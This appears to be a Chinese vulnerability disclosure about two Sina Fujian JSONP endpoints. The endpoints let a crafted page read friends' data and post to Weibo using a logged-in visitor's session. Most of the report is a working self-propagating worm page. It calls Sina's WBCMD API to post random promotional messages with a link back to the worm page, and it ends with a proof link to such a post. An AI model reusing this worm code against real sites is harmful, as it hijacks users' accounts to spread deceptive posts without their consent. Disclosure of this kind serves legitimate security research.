福建新浪个人中心调用的两个jsonp接口可以被恶意利用，获取好友信息，并利用cookie劫持无需其他授权发布欺骗信息。就像蠕虫一样传播。

关键代码：
<head>
           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 
        <title>Sample Page</title>
 
        <script type="text/javascript" src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js"></script>
        <script type="text/javascript" src="http://fj.sinaimg.cn/utils/API-pack.js"></script>
        <script type="text/javascript">
            var content = ['嘿嘿，w ww.2cto.com 推荐大家收听@丸子-_- ，他写的这个东西很好玩,http://wanz.im/sinaworm.html',
                            '我擦，@丸子-_- 他写的这个东西太牛逼了,http://wanz.im/sinaworm.html',
                            '昂~@丸子-_- 他写的这个东西好羞色哟~,http://wanz.im/sinaworm.html'],
                pics = ["http://ww1.sinaimg.cn/bmiddle/7e7fc78bgw1ds88rpzhefj.jpg","http://ww1.sinaimg.cn/bmiddle/7e7fc78bgw1ds88rpzhefj.jpg"],
                i = Math.floor(Math.random() * 2),
                pic = pics[i],
                success = function(json){
                    //window.location='http://weibo.com/hiwanz';
                },
 
                failure = function(json){
                    //alert(json.errmsg);
                },
                url = "http://common.fj.sina.com.cn/index.php/201205hgktv/weibolottery/publish?callback=?";
 
            WBCMD("post",{content:content[Math.round(Math.random()*2)],pic:pic,atNum:1,filter:[],must:[],url:url},success,failure);
 
        </script>
    </head>

漏洞证明：

http://www.weibo.com/2254653223/yloiziEGU